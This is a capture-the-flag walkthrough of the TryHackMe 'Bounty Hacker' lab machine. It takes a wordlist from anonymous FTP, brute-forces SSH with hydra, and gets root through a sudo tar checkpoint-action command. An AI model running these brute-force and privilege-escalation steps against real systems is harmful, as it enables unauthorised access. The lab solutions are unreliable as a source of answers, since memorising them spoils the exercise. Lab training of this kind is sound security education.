Bounty Hacker TryHackMe Room

Room Covers:

  • Service Discovery
  • Local Privilege Escalation

Target Details

  • IP: 10.10.160.10

Service Discovery

  • Using nmap

    nmap -sV -sC -Pn -oN scan.txt 10.10.160.10
    
  • Scan Results

    # Nmap 7.92 scan initiated Thu Jun 30 12:36:54 2022 as: nmap -sC -sV -Pn -oN scan.txt 10.10.160.10
    Nmap scan report for 10.10.160.10
    Host is up (0.39s latency).
    Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused)
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:10.x.x.x
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 2
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
    |_-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
    |   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
    |_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Thu Jun 30 12:37:34 2022 -- 1 IP address (1 host up) scanned in 40.35 seconds
    
  • OS: Ubuntu

  • Services Found

    Service Port Version
    HTTP 80 Apache/2.4.18
    FTP 21 vsftpd 3.0.3
    SSH 22 OpenSSH 7.2p2

Try Accessing FTP

  • Trying to access FTP anonymously

    Connected to 10.10.160.10.
    220 (vsFTPd 3.0.3)
    Name (10.10.160.10:attacker): anonymous
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp>
    
  • We get successfully logged in as anonymous user

  • list and download files

    # list files
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
    -rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
    226 Directory send OK.
    ftp>
    
    # download all files
    ftp> mget * .
    
    # press return key whenever prompted to download
    
  • locks.txt file appears to be a wordlist

Bruteforce SSH service

  • Assuming user to be lin from task.txt file, we bruteforce this account with downloaded locks.txt file

    hydra -l lin -P locks.txt ssh://10.10.160.10
    

    Password: RedDr4gonxxxxxxxxx

  • We’ve successfully found the SSH password for user lin

Login to SSH

  • Login Details

    User Password
    lin RedDr4gonxxxxxxxxx
  • Login to SSH using above details

Privilege Escalation

  • Find SUID files

    find / -perm -u=s -type f 2>/dev/null
    
  • sudo can be used by lin, hence to find commands that can be used by lin and executed as root, we run below command

    sudo -l
    
    Matching Defaults entries for lin on bountyhacker:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User lin may run the following commands on bountyhacker:
        (root) /bin/tar
    
    

    /bin/tar can be executed by lin as root

  • Searching for tar on GTFObins, we can escalate privileges using below command

    sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
    
  • Machine is now rooted

    # whoami
    root
    

Get Flags

  • User Flag

    # cat /home/lin/Desktop/user.txt
    THM{CR1M3_xxxxxxxxx}
    
  • Root Flag

    # cat /root/root.txt
    THM{80UN7Y_xxxxxx}